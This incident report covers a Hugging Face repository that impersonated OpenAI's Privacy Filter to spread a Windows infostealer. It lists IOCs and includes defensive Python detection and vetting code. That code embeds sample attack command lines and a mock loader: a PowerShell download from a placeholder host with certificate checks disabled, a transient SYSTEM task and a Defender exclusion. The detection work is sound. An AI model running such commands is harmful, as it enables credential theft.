Full Report
A malicious Hugging Face repository managed to take a spot in the platform's trending list by impersonating OpenAI's Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users. The project, named Open-OSS/privacy-filter, masqueraded as its legitimate counterpart released by OpenAI late last month (openai/privacy-filter), including copying the entire description
Analysis Summary
# Incident Report: Malicious Impersonation of OpenAI Privacy Filter on Hugging Face
## Executive Summary
A malicious actor uploaded a repository to Hugging Face under a lookalike namespace (`Open-OSS` rather than `openai`), impersonating OpenAI's "Privacy Filter" model in order to distribute a Rust-based information stealer. The repository used artificially inflated engagement metrics to reach the #1 trending spot and showed more than 244,000 downloads before being disabled; because those metrics were botted, the figure is not a confirmed victim count. The attack targeted Windows users, harvesting cryptocurrency wallet data, browser credentials, and Discord tokens.
## Incident Details
- **Discovery Date:** May 2026 (Reported by HiddenLayer)
- **Incident Date:** Late April to May 2026
- **Affected Organization:** Users of Hugging Face; impersonated OpenAI
- **Sector:** AI/Technology, Supply Chain
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** May 2026
- **Vector:** Supply Chain (namespace impersonation of a trusted model repository)
- **Details:** Attackers created a repository `Open-OSS/privacy-filter` mimicking the legitimate `openai/privacy-filter`. They copied the documentation verbatim and used bots to inflate likes (667) and downloads (244,000) so that the repository reached "Trending" status.
### Lateral Movement
- **Details:** No lateral movement was observed. Once executed on a victim's machine, the malware focused on local privilege escalation and data harvesting rather than moving to other hosts.
### Data Exfiltration/Impact
- **Details:** The Rust-based payload harvested Discord tokens, cryptocurrency wallet seed phrases/extensions, FileZilla configurations, system metadata, and browser data (Chromium/Gecko). Screenshots were also captured.
### Detection & Response
- **How it was discovered:** Research by the HiddenLayer Research Team.
- **Response actions taken:** Hugging Face disabled access to the malicious repository and several other identified secondary repositories.
## Attack Methodology
- **Initial Access:** Namespace impersonation and social engineering (masquerading as a trusted OpenAI model, backed by botted popularity metrics).
- **Persistence:** None observed. The scheduled task was created to run once in SYSTEM context and deleted immediately afterward, so it served as a one-shot elevated execution mechanism rather than persistence.
- **Privilege Escalation:** A malicious batch script triggered a UAC prompt that the victim was expected to approve; the elevated rights were then used to register the scheduled task running as SYSTEM.
- **Defense Evasion:** Disabling SSL verification; AMSI and ETW bypass; Microsoft Defender exclusions; Sandbox/VM/Debugger detection; Dead drop resolver (JSON Keeper).
- **Credential Access:** Harvesting browser-stored passwords, Discord tokens, and wallet seed phrases.
- **Discovery:** System metadata collection and environment checks for virtualizations.
- **Lateral Movement:** N/A.
- **Collection:** Automated gathering of files (FileZilla, wallets) and screenshotting.
- **Exfiltration:** Data sent in JSON format to `recargapopular[.]com`.
- **Impact:** Significant data theft and compromise of sensitive financial/personal accounts.
## Impact Assessment
- **Financial:** High potential loss due to the theft of cryptocurrency wallet seed phrases.
- **Data Breach:** Extensive in scope; includes PII, login credentials, and session tokens. The 244k download figure was inflated by bots, so the number of actual victims is unknown.
- **Operational:** System compromise via a one-shot SYSTEM-context execution.
- **Reputational:** High impact on the perceived safety of Hugging Face's "Trending" list and supply chain trust.
## Indicators of Compromise
- **Network Indicators:**
- `api.eth-fastscan[.]org` (Payload hosting)
- `recargapopular[.]com` (Exfiltration)
- `welovechinatown[.]info` (C2/Secondary payload)
- `jsonkeeper[.]com` (Dead drop resolver)
- **File Indicators:**
- `loader.py`
- `start.bat`
- `o0q2l47f.exe` (Associated binary)
- **Behavioral Indicators:**
- PowerShell execution with TLS/SSL certificate validation disabled, spawned from a model-loading or setup script.
- Automated creation and immediate deletion of SYSTEM-level scheduled tasks.
- Unexpected UAC prompts from AI model setup scripts.
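The three behavioural indicators above can be expressed as detection rules over process-creation telemetry. The following is an added example, not code from the HiddenLayer report: it runs three rules over a handful of constructed Sysmon-style events. The field names (`time`, `image`, `command_line`, `parent_image`, `user`), the 60-second create-to-delete window, the sample command lines and the `example.invalid` domain are assumptions chosen to model the chain described in this report, not captured data.

```python
"""Behavioural detections for the loader chain in the IOC section.

Added example, not the report's code. Three rules run over constructed
Sysmon-style ProcessCreate events (field names are assumptions):
  1. PowerShell launched with TLS certificate validation disabled
  2. a SYSTEM scheduled task created and deleted within a short window
  3. a Microsoft Defender exclusion being added
"""
import re
from datetime import datetime, timedelta

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PY = r"C:\Python312\python.exe"
TMP = r"C:\Users\alice\AppData\Local\Temp"


def _ev(t, image, cmd, parent, user="DESKTOP\\alice"):
    return {"time": t, "image": image, "command_line": cmd, "parent_image": parent, "user": user}


# Constructed telemetry modelled on the described chain (python loader ->
# PowerShell with SSL checks off -> transient SYSTEM task -> Defender exclusion),
# plus one benign scheduled-task creation that must not alert. Not real data.
EVENTS = [
    _ev("2026-05-02T10:00:00", PY, "python loader.py", r"C:\Windows\explorer.exe"),
    _ev("2026-05-02T10:00:02", PS,
        'powershell -nop -w hidden -c "[Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; '
        'iwr https://api.example.invalid/s -OutFile %TEMP%\\start.bat"', PY),
    _ev("2026-05-02T10:00:09", SCHTASKS,
        f'schtasks /create /tn Updater /tr "{TMP}\\o0q2l47f.exe" /sc once /st 00:00 /ru SYSTEM /f', CMD),
    _ev("2026-05-02T10:00:10", SCHTASKS, "schtasks /run /tn Updater", CMD),
    _ev("2026-05-02T10:00:12", SCHTASKS, "schtasks /delete /tn Updater /f", CMD),
    _ev("2026-05-02T10:00:13", PS, f'powershell Add-MpPreference -ExclusionPath "{TMP}"', CMD, "NT AUTHORITY\\SYSTEM"),
    _ev("2026-05-02T11:30:00", SCHTASKS,
        r"schtasks /create /tn NightlyBackup /tr C:\Tools\backup.exe /sc daily /st 02:00", CMD),
]

SSL_BYPASS = re.compile(
    r"ServerCertificateValidationCallback|-SkipCertificateCheck|TrustAllCerts|ICertificatePolicy", re.I)
DEFENDER_TAMPER = re.compile(r"(?:Add|Set)-MpPreference\s+-(?:Exclusion\w+|Disable\w+)", re.I)
# Task names containing spaces would need quote-aware parsing; \S+ is enough for this demo.
TASK_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create\b.*?/tn\s+(\S+).*?/ru\s+\"?(?:NT AUTHORITY\\)?SYSTEM\b", re.I)
TASK_DELETE = re.compile(r"schtasks(?:\.exe)?\s+/delete\b.*?/tn\s+(\S+)", re.I)


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_ssl_bypass(events):
    """PowerShell command lines that turn off TLS certificate validation."""
    return [e for e in events
            if e["image"].lower().endswith("powershell.exe") and SSL_BYPASS.search(e["command_line"])]


def detect_defender_exclusion(events):
    """Add-/Set-MpPreference calls that add exclusions or disable protections."""
    return [e for e in events if DEFENDER_TAMPER.search(e["command_line"])]


def detect_transient_system_task(events, window_seconds=60):
    """A /ru SYSTEM task deleted within `window_seconds` of its creation:
    one-shot elevated execution rather than persistence."""
    pending, hits = {}, []
    for e in sorted(events, key=_ts):
        created = TASK_CREATE.search(e["command_line"])
        if created:
            pending[created.group(1).strip('"').lower()] = e
            continue
        deleted = TASK_DELETE.search(e["command_line"])
        if deleted:
            name = deleted.group(1).strip('"').lower()
            c = pending.pop(name, None)
            if c and _ts(e) - _ts(c) <= timedelta(seconds=window_seconds):
                hits.append({"task": name, "created": c["time"], "deleted": e["time"],
                             "command_line": c["command_line"]})
    return hits


def run_detections(events):
    """Return (rule, time, context) tuples, oldest first."""
    alerts = [("powershell_ssl_validation_disabled", e["time"], e["parent_image"])
              for e in detect_ssl_bypass(events)]
    alerts += [("transient_system_scheduled_task", h["created"], h["task"])
               for h in detect_transient_system_task(events)]
    alerts += [("defender_exclusion_added", e["time"], e["user"])
               for e in detect_defender_exclusion(events)]
    return sorted(alerts, key=lambda a: a[1])


if __name__ == "__main__":
    for alert in run_detections(EVENTS):
        print(*alert)
```

The create-then-delete correlation is the rule worth keeping: a SYSTEM task that lives for a few seconds is almost never legitimate administration, whereas each individual `schtasks` call looks routine on its own. The parent image on the PowerShell alert (here `python.exe`) is what ties the chain back to a model loader.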
## Response Actions
- **Containment:** Hugging Face took down the primary `Open-OSS/privacy-filter` repository.
- **Eradication:** Six additional repositories under the `anthfu/` namespace were identified and removed.
- **Recovery:** Public reporting by HiddenLayer to alert the community and provide IOCs for remediation.
## Lessons Learned
- **Key Takeaways:** Popularity metrics (likes/downloads) on platform marketplaces are easily manipulated and should not be the sole basis for trust.
- **Gaps:** AI model repositories often require executing scripts (like `loader.py`) to function, providing a seamless vector for traditional malware.
## Recommendations
- **Verify Sources:** Always check the organization namespace on Hugging Face before downloading. The legitimate model is published under `openai/`; a lookalike such as `Open-OSS/` is not an OpenAI namespace, however closely the model card matches.
- **Sandbox Execution:** Run experimental or new AI models in isolated, non-persistent virtual environments.
- **Code Review:** Inspect `loader.py` or `setup` scripts in public repositories for Base64 encoded URLs or suspicious PowerShell calls before execution.
- **Monitor Platforms:** Platform providers should implement stricter verification for "Trending" algorithms to prevent bot-driven manipulation.
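The "Verify Sources" and "Code Review" recommendations can be automated as a pre-execution gate. The following is an added example, not code from HiddenLayer, Hugging Face or the report: it flags a namespace that merely resembles a trusted organisation, and statically scans a repository's loader and setup scripts for Base64-encoded URLs and the PowerShell, scheduled-task, Defender and UAC patterns described above. The trusted-org list, the similarity threshold, the pattern set and the two sample loader texts (which reference `example.invalid` and are scanned, never executed) are assumptions constructed for this example.

```python
"""Pre-download vetting of a Hugging Face repository.

Added example, not code from the report. Two checks:
  1. namespace: is the author a trusted org, a lookalike of one, or unknown?
  2. static scan of loader/setup scripts for Base64-encoded URLs and the
     PowerShell/schtasks/Defender/UAC patterns described in the report.
Trusted orgs, threshold and patterns are this example's own assumptions.
"""
import base64
import re
from difflib import SequenceMatcher

TRUSTED_ORGS = {"openai", "meta-llama", "google", "microsoft", "mistralai"}  # assumption


def _norm(s):
    return re.sub(r"[^a-z0-9]", "", s.lower())


def check_namespace(repo_id, trusted=TRUSTED_ORGS, threshold=0.6):
    """Return (verdict, detail): 'trusted', 'lookalike' or 'unknown'."""
    org, _, _name = repo_id.partition("/")
    if org in trusted:
        return "trusted", org
    for t in sorted(trusted):
        if _norm(org) == _norm(t) or SequenceMatcher(None, _norm(org), _norm(t)).ratio() >= threshold:
            return "lookalike", f"{org!r} resembles trusted org {t!r}"
    return "unknown", org


B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s'\"<>]+")
SUSPICIOUS = {
    "powershell_invocation": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "ssl_verification_disabled": re.compile(
        r"ServerCertificateValidationCallback|verify\s*=\s*False|-SkipCertificateCheck|CERT_NONE", re.I),
    "scheduled_task": re.compile(r"schtasks|Register-ScheduledTask", re.I),
    "defender_tamper": re.compile(r"(?:Add|Set)-MpPreference", re.I),
    "amsi_tamper": re.compile(r"AmsiScanBuffer|amsiInitFailed|amsi\.dll", re.I),
    "uac_prompt": re.compile(r"Start-Process[^\n]*-Verb\s+RunAs|\brunas\b", re.I),
}


def decoded_urls(text):
    """URLs hidden inside Base64 blobs (the report's loader decoded its stage URL)."""
    found = []
    for blob in B64_BLOB.findall(text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        except ValueError:  # long identifiers also match the blob regex; skip undecodable ones
            continue
        found += URL.findall(raw.decode("utf-8", "ignore"))
    return found


def scan_script(text):
    findings = [label for label, pat in SUSPICIOUS.items() if pat.search(text)]
    findings += [f"base64_encoded_url:{u}" for u in decoded_urls(text)]
    return findings


def vet_repository(repo_id, files):
    """files: {filename: text}. 'block' on any finding or a lookalike org,
    'review' for an unknown org with clean scripts, 'ok' otherwise."""
    verdict, detail = check_namespace(repo_id)
    per_file = {name: scan_script(text) for name, text in files.items()
                if name.endswith((".py", ".bat", ".ps1", ".sh", ".cmd"))}
    if verdict == "lookalike" or any(per_file.values()):
        decision = "block"
    elif verdict == "unknown":
        decision = "review"
    else:
        decision = "ok"
    return {"namespace": (verdict, detail), "files": per_file, "decision": decision}


# Constructed loader texts for the demo; neither is real and neither is executed.
_STAGE = base64.b64encode(b"https://api.example.invalid/stage/start.bat").decode()
MALICIOUS_LOADER = '''
import base64, subprocess
url = base64.b64decode("STAGE_B64").decode()
ps = ("[Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; "
      "iwr " + url + " -OutFile $env:TEMP\\\\start.bat; Start-Process $env:TEMP\\\\start.bat -Verb RunAs")
subprocess.run(["powershell", "-nop", "-w", "hidden", "-c", ps])
'''.replace("STAGE_B64", _STAGE)
BENIGN_LOADER = '''
from transformers import AutoModelForTokenClassification, AutoTokenizer
tok = AutoTokenizer.from_pretrained(".")
model = AutoModelForTokenClassification.from_pretrained(".")
'''

if __name__ == "__main__":
    for rid, ldr in (("Open-OSS/privacy-filter", MALICIOUS_LOADER), ("openai/privacy-filter", BENIGN_LOADER)):
        print(rid, vet_repository(rid, {"loader.py": ldr}))
```

In practice `files` would be read from the downloaded snapshot directory before anything in it is imported or run. A `review` verdict for an unknown but clean namespace is deliberate: most legitimate community models come from non-famous authors, and the gate should slow those down rather than refuse them, whereas a namespace that looks like OpenAI's but is not is reason enough to stop regardless of what the scripts contain.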